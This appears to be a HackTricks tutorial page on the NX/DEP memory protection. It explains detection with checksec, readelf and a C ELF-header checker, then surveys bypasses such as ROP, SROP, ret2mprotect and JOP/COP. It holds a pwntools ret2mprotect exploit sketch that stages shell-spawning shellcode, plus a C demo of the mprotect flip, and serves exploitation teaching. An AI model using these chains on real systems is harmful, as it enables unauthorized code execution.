No-exec / NX
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
The No-Execute (NX) bit, also known as Execute Disable (XD) in Intel terminology (and exposed to users as DEP on Windows), is a hardware-backed security feature designed to mitigate buffer overflow attacks. It is a per-page flag in the page-table entry: when the MMU fetches an instruction from a page marked NX, it raises a fault instead of executing it. With NX the operating system can separate memory regions intended for executable code from those intended for data, such as the stack and the heap. The core idea is to stop an attacker who exploits a buffer overflow from placing shellcode on the stack (or any other data region) and redirecting control flow to it.
Modern operating systems enforce NX through page-table permissions, and the ELF loader decides the initial stack permissions from the program headers. The flags of the PT_GNU_STACK header tell the kernel whether the stack should be RW or RWX; they are set at link time by `-z noexecstack` / `-z execstack`, and GNU ld silently requests an executable stack if any input object lacks a `.note.GNU-stack` section (a classic side effect of hand-written assembly). The GNU_PROPERTY_X86_FEATURE_1_SHSTK and GNU_PROPERTY_X86_FEATURE_1_IBT notes in `.note.gnu.property` are unrelated to this: they advertise CET shadow-stack and indirect-branch-tracking support, not stack executability. When NX is active and the binary was linked with a non-executable stack, any attempt to redirect execution into attacker-controlled data pages (stack, heap, mmap'd buffers, etc.) faults unless those pages were explicitly made executable. One caveat: on older x86 kernels a missing PT_GNU_STACK header triggered the READ_IMPLIES_EXEC personality, which makes every readable mapping executable; Linux 5.8 dropped that fallback for 64-bit x86 processes, so do not assume a header-less binary is protected on a legacy kernel.
Identifying NX quickly
- `checksec --file ./vuln` prints `NX enabled` or `NX disabled` based on the `GNU_STACK` program header.
- `readelf -W -l ./vuln | grep GNU_STACK` shows the stack permissions; the presence of the `E` flag means the stack is executable. Example:

```bash
$ readelf -W -l ./vuln | grep GNU_STACK
GNU_STACK 0x000000 0x000000 0x000000 0x000000 0x000000 RW 0x10
```

- `execstack -q ./vuln` (from prelink) is handy when auditing large collections of binaries because it prints `X` for every binary that still has an executable stack.
- At runtime, `/proc/<pid>/maps` shows whether a given mapping is `rwx`, `rw-`, `r-x`, etc., which is the check to run when verifying JIT engines or custom allocators.
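To see exactly what `checksec` and `readelf` are reading, the following added example (written for this page, not code from the original or from any of those tools) walks the ELF64 program headers itself using glibc's `<elf.h>`, classifies the `PT_GNU_STACK` flags, and distinguishes the "header missing" case that older kernels treated as executable. The `build_test_image` helper fabricates a minimal synthetic ELF image in memory so the classifier can be exercised without a real binary; `/proc/self/exe` is only used as a default path in `main`.

```c
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Classification of the PT_GNU_STACK program header, i.e. what checksec
   reports as "NX enabled" / "NX disabled". */
enum nx_status {
    NX_ENABLED,       /* PT_GNU_STACK present, no PF_X: stack mapped RW   */
    NX_DISABLED,      /* PT_GNU_STACK carries PF_X: stack mapped RWX      */
    NX_NO_GNU_STACK,  /* header missing: behaviour depends on the kernel  */
    NX_BAD_ELF        /* not a well-formed ELF64 image (or I/O failure)   */
};

/* Walk the program headers of an in-memory ELF64 image. Every offset is
   bounds-checked against len so a truncated or hostile file cannot make
   the parser read outside the buffer. */
enum nx_status nx_status_from_image(const uint8_t *img, size_t len)
{
    Elf64_Ehdr eh;
    if (len < sizeof eh)
        return NX_BAD_ELF;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_phentsize != sizeof(Elf64_Phdr))
        return NX_BAD_ELF;
    if (eh.e_phoff > len ||
        (uint64_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff)
        return NX_BAD_ELF;

    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, img + eh.e_phoff + (size_t)i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_STACK)
            return (ph.p_flags & PF_X) ? NX_DISABLED : NX_ENABLED;
    }
    return NX_NO_GNU_STACK;   /* no header: see the READ_IMPLIES_EXEC caveat */
}

/* Read just enough of a file (ELF header + program header table) and classify it. */
enum nx_status nx_status_of_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f)
        return NX_BAD_ELF;
    Elf64_Ehdr eh;
    if (fread(&eh, 1, sizeof eh, f) != sizeof eh ||
        eh.e_phoff > (64u << 20) || eh.e_phnum > 4096) {   /* sanity caps */
        fclose(f);
        return NX_BAD_ELF;
    }
    size_t need = (size_t)eh.e_phoff + (size_t)eh.e_phnum * sizeof(Elf64_Phdr);
    uint8_t *img = malloc(need);
    if (!img) { fclose(f); return NX_BAD_ELF; }
    rewind(f);
    size_t got = fread(img, 1, need, f);
    fclose(f);
    enum nx_status s = nx_status_from_image(img, got);
    free(img);
    return s;
}

/* Constructed test input: a minimal synthetic ELF64 image with one PT_LOAD and,
   optionally, one PT_GNU_STACK carrying stack_flags. Returns the image size,
   or 0 if cap is too small. */
size_t build_test_image(uint8_t *out, size_t cap, int with_gnu_stack, uint32_t stack_flags)
{
    Elf64_Ehdr eh;
    Elf64_Phdr ph[2];
    memset(&eh, 0, sizeof eh);
    memset(ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_type = ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof(Elf64_Phdr);
    eh.e_phnum = with_gnu_stack ? 2 : 1;
    ph[0].p_type = PT_LOAD;
    ph[0].p_flags = PF_R | PF_X;
    ph[1].p_type = PT_GNU_STACK;
    ph[1].p_flags = stack_flags;
    size_t n = sizeof eh + eh.e_phnum * sizeof(Elf64_Phdr);
    if (cap < n)
        return 0;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, ph, n - sizeof eh);
    return n;
}

int main(int argc, char **argv)
{
    static const char *names[] = {
        "NX enabled (PT_GNU_STACK RW)", "NX disabled (PT_GNU_STACK RWE)",
        "no PT_GNU_STACK header", "not a valid ELF64 file" };
    const char *path = argc > 1 ? argv[1] : "/proc/self/exe";
    printf("%s: %s\n", path, names[nx_status_of_file(path)]);
    return 0;
}
```

Run it as `./nxcheck ./vuln`; the "no PT_GNU_STACK header" result is the one to treat with suspicion, because `checksec` folds it into "NX enabled" while a legacy 32-bit kernel would hand that process an executable stack.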
Bypasses
Code-reuse primitives
It is possible to use techniques such as ROP to bypass this protection by executing chunks of already-executable code that exist in the binary or its libraries. A typical chain uses one of:
- Ret2libc
- Ret2syscall
- Ret2dlresolve when the binary does not import system/execve
- Ret2csu or Ret2vdso to synthesize syscalls
- Ret2… — any dispatcher that lets you stitch controlled register state with existing executable code to invoke syscalls or library gadgets.
The workflow is usually: (1) leak a code or libc pointer through an info leak, (2) resolve the function bases from it, and (3) build a chain that never needs attacker-controlled executable bytes at all.
Sigreturn Oriented Programming (SROP)
SROP builds a fake signal frame on a writable page and pivots execution to sys_rt_sigreturn (or the relevant ABI equivalent; on x86-64 that is syscall number 15, so the gadget must be reached with rax=15). The kernel then "restores" the crafted context, instantly granting full control over every general-purpose register, rip and eflags. Recent CTF challenges (for example, the Hostel task in n00bzCTF 2023) show how SROP chains first call mprotect to turn the stack RWX and then reuse that same stack for shellcode, effectively bypassing NX even when only a single `syscall; ret` gadget is available. Remember that mprotect requires a page-aligned address, so the frame must point rdi at the start of the stack page, not at the overflowed buffer. Check the dedicated SROP page for more architecture-specific tricks.
Ret2mprotect / ret2syscall to flip permissions
If you can call mprotect, pkey_mprotect, or even dlopen (loading a shared object you control), you can legitimately request an executable mapping before running shellcode. A minimal pwntools sketch looks like this; it assumes the binary imports mprotect and read through the PLT and that `offset` is the distance from the overflowed buffer to the saved return address:

```python
from pwn import *
elf = ELF("./vuln")
rop = ROP(elf)
page = elf.bss() & ~0xfff                    # mprotect() needs a page-aligned address
shellcode = asm(shellcraft.sh())
rop.mprotect(page, 0x1000, 7)                # PROT_READ|PROT_WRITE|PROT_EXEC
rop.read(0, page, len(shellcode))            # stage the shellcode into the now-RWX page
rop.raw(page)                                # "return" into it
payload = flat({offset: rop.chain()})        # offset = bytes up to the saved return address
io = process(elf.path); io.send(payload); io.send(shellcode); io.interactive()
```
The same idea applies to ret2syscall chains that load rax=__NR_mprotect (10 on x86-64), point rdi at a page-aligned address in an mmap'd region or .bss, put the length in rsi, and set rdx=7 (PROT_READ|PROT_WRITE|PROT_EXEC). Once an RWX region exists, execution can safely jump into attacker-controlled bytes; `/proc/<pid>/maps` will show the flipped page as `rwxp`.
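The following added example (written for this page; it is neither the page's original code nor taken from any CTF solution) shows the NX fault and the mprotect flip described in the SROP and ret2mprotect paragraphs from inside a single process, without a vulnerable binary: it stages a constructed x86-64 stub (`mov eax, 42 ; ret`) in an anonymous RW page, proves that calling it faults under NX by trapping SIGSEGV, then performs the same `mprotect(page, len, 7)` call a ROP/SROP chain would make and calls the stub successfully. `perms_of` parses `/proc/self/maps` the way the detection section suggests. The stub bytes are x86-64 only, so the file refuses to compile elsewhere.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#if !defined(__x86_64__)
#error "the constructed stub below is x86-64 machine code"
#endif

/* Constructed stand-in for shellcode: mov eax, 42 ; ret */
static const uint8_t STUB[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

static sigjmp_buf nx_fault_env;

static void nx_fault_handler(int sig)
{
    (void)sig;
    siglongjmp(nx_fault_env, 1);   /* unwind out of the faulting call */
}

/* Map one anonymous RW page and copy the stub into it, exactly as an exploit
   stages shellcode in a data region. Returns NULL on failure. */
void *stage_stub(void)
{
    long pg = sysconf(_SC_PAGESIZE);
    void *p = mmap(NULL, (size_t)pg, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    memcpy(p, STUB, sizeof STUB);
    return p;
}

/* Find the mapping containing addr in /proc/self/maps and copy its permission
   string ("rw-p", "rwxp", ...) into out. Returns 0 on success, -1 if not found. */
int perms_of(const void *addr, char out[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return -1;
    char line[512];
    int rc = -1;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char perms[5];
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) != 3)
            continue;
        if ((uintptr_t)addr >= lo && (uintptr_t)addr < hi) {
            memcpy(out, perms, 5);
            rc = 0;
            break;
        }
    }
    fclose(f);
    return rc;
}

/* Call the stub, trapping the SIGSEGV that NX raises when the page is not
   executable. Returns the stub's value (42) or -1 if the call faulted. */
int try_call(void *code)
{
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = nx_fault_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);
    volatile int rv = -1;
    if (sigsetjmp(nx_fault_env, 1) == 0)
        rv = ((int (*)(void))code)();   /* faults unless the page is executable */
    sigaction(SIGSEGV, &old, NULL);
    return rv;
}

/* The ret2mprotect step: flip the page to RWX (PROT value 7, as in the chain). */
int make_rwx(void *page)
{
    long pg = sysconf(_SC_PAGESIZE);
    return mprotect(page, (size_t)pg, PROT_READ | PROT_WRITE | PROT_EXEC);
}

int main(void)
{
    void *page = stage_stub();
    char perms[5] = "????";
    perms_of(page, perms);
    printf("before mprotect: %s, call -> %d\n", perms, try_call(page));
    make_rwx(page);
    perms_of(page, perms);
    printf("after  mprotect: %s, call -> %d\n", perms, try_call(page));
    return 0;
}
```

The first call returns -1 because the CPU refuses to fetch from the `rw-p` page; after `make_rwx` the same bytes run and return 42. On systems with SELinux `execmem` denial or similar W^X policies the mprotect call itself fails, which is exactly the hardening that makes the ret2mprotect approach unusable there.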
RWX primitives from JIT engines and kernels
JIT engines, interpreters, GPU drivers and kernel subsystems that generate code at runtime are a common way to regain executable memory even under strict NX policies. The 2024 Linux kernel vulnerability CVE-2024-42067 showed that an unchecked failure of set_memory_rox() left eBPF JIT pages both writable and executable, allowing an attacker to plant gadgets or whole shellcode blobs inside the kernel despite the NX/W^X expectation. Exploits that gain control of a JIT compiler (BPF, JavaScript, Lua, etc.) can arrange for their payload to live in those RWX regions and then need only a single function-pointer overwrite to jump into it.
Non-return code reuse (JOP/COP)
If ret instructions are policed (for example by a CET shadow stack) or the binary simply lacks useful ret gadgets, switch to Jump-Oriented Programming (JOP) or Call-Oriented Programming (COP). These techniques build dispatchers out of sequences ending in jmp [reg] or call [reg] found in the binary or its loaded libraries. They respect NX, since they only reuse code that is already executable, but they sidestep mitigations aimed at long chains of ret instructions. Note that CET's indirect-branch tracking (IBT) constrains JOP/COP too: every indirect jump or call target must start with endbr64, which shrinks the usable gadget set.